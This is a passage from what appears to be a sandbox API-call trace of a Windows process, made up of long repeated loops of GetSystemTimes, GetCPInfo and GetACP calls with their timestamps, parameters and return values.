lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.497] GetACP () returned 0x4e4 [0178.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.497] GetACP () returned 0x4e4 [0178.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.498] GetACP () returned 0x4e4 [0178.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.498] GetACP () returned 0x4e4 [0178.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.498] GetACP () returned 0x4e4 [0178.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.498] GetACP () returned 0x4e4 [0178.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.498] GetACP () returned 0x4e4 [0178.498] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.499] GetACP () returned 0x4e4 [0178.499] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.499] GetACP () returned 0x4e4 [0178.499] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.499] GetACP () returned 0x4e4 [0178.499] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.499] GetACP () returned 0x4e4 [0178.499] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.499] GetACP () returned 0x4e4 [0178.499] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.499] GetACP () returned 0x4e4 [0178.499] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.500] GetACP () returned 0x4e4 [0178.500] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.500] GetACP () returned 0x4e4 [0178.500] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.500] GetACP () returned 0x4e4 [0178.500] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.500] GetACP () returned 0x4e4 [0178.500] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.500] GetACP () returned 0x4e4 [0178.500] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.501] GetACP () returned 0x4e4 [0178.501] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.501] GetACP () returned 0x4e4 [0178.501] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.501] GetACP () returned 0x4e4 [0178.501] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.501] GetACP () returned 0x4e4 [0178.501] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.501] GetACP () returned 0x4e4 [0178.501] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.501] GetACP () returned 0x4e4 [0178.502] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.502] GetACP () returned 0x4e4 [0178.502] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.553] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.553] GetACP () returned 0x4e4 [0178.553] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.553] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.553] GetACP () returned 0x4e4 [0178.553] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.553] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.553] GetACP () returned 0x4e4 [0178.553] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.553] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.553] GetACP () returned 0x4e4 [0178.553] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.553] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.553] GetACP () returned 0x4e4 [0178.553] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.554] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.554] GetACP () returned 0x4e4 [0178.554] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.554] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.554] GetACP () returned 0x4e4 [0178.554] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.554] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.554] GetACP () returned 0x4e4 [0178.554] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.554] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.554] GetACP () returned 0x4e4 [0178.554] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.554] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.554] GetACP () returned 0x4e4 [0178.554] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.554] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.554] GetACP () returned 0x4e4 [0178.554] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.555] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.555] GetACP () returned 0x4e4 [0178.555] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.555] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.555] GetACP () returned 0x4e4 [0178.555] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.555] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.555] GetACP () returned 0x4e4 [0178.555] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.555] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.555] GetACP () returned 0x4e4 [0178.555] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.555] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.555] GetACP () returned 0x4e4 [0178.555] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.555] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.555] GetACP () returned 0x4e4 [0178.555] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.556] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.556] GetACP () returned 0x4e4 [0178.556] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.556] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.556] GetACP () returned 0x4e4 [0178.556] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.556] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.556] GetACP () returned 0x4e4 [0178.556] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.556] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.556] GetACP () returned 0x4e4 [0178.556] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.556] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.556] GetACP () returned 0x4e4 [0178.556] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.557] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.557] GetACP () returned 0x4e4 [0178.557] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.557] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.557] GetACP () returned 0x4e4 [0178.557] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.557] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.557] GetACP () returned 0x4e4 [0178.557] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.557] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.557] GetACP () returned 0x4e4 [0178.557] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.557] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.557] GetACP () returned 0x4e4 [0178.557] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.557] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.557] GetACP () returned 0x4e4 [0178.558] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.558] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.558] GetACP () returned 0x4e4 [0178.558] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.558] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.558] GetACP () returned 0x4e4 [0178.558] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.558] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.558] GetACP () returned 0x4e4 [0178.558] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.558] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.558] GetACP () returned 0x4e4 [0178.558] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.558] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.558] GetACP () returned 0x4e4 [0178.558] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.558] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.559] GetACP () returned 0x4e4 [0178.559] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.559] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.559] GetACP () returned 0x4e4 [0178.559] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.559] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.559] GetACP () returned 0x4e4 [0178.559] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.559] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.559] GetACP () returned 0x4e4 [0178.559] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.559] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.559] GetACP () returned 0x4e4 [0178.559] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.559] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.559] GetACP () returned 0x4e4 [0178.560] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.560] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.560] GetACP () returned 0x4e4 [0178.560] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.560] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.560] GetACP () returned 0x4e4 [0178.560] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.560] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.560] GetACP () returned 0x4e4 [0178.560] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.560] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.560] GetACP () returned 0x4e4 [0178.560] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.560] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.560] GetACP () returned 0x4e4 [0178.560] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.561] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.561] GetACP () returned 0x4e4 [0178.561] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.561] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.561] GetACP () returned 0x4e4 [0178.561] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.561] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.561] GetACP () returned 0x4e4 [0178.561] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.561] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.561] GetACP () returned 0x4e4 [0178.561] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.561] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.561] GetACP () returned 0x4e4 [0178.561] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.562] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.562] GetACP () returned 0x4e4 [0178.562] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.562] GetCPInfo (in: 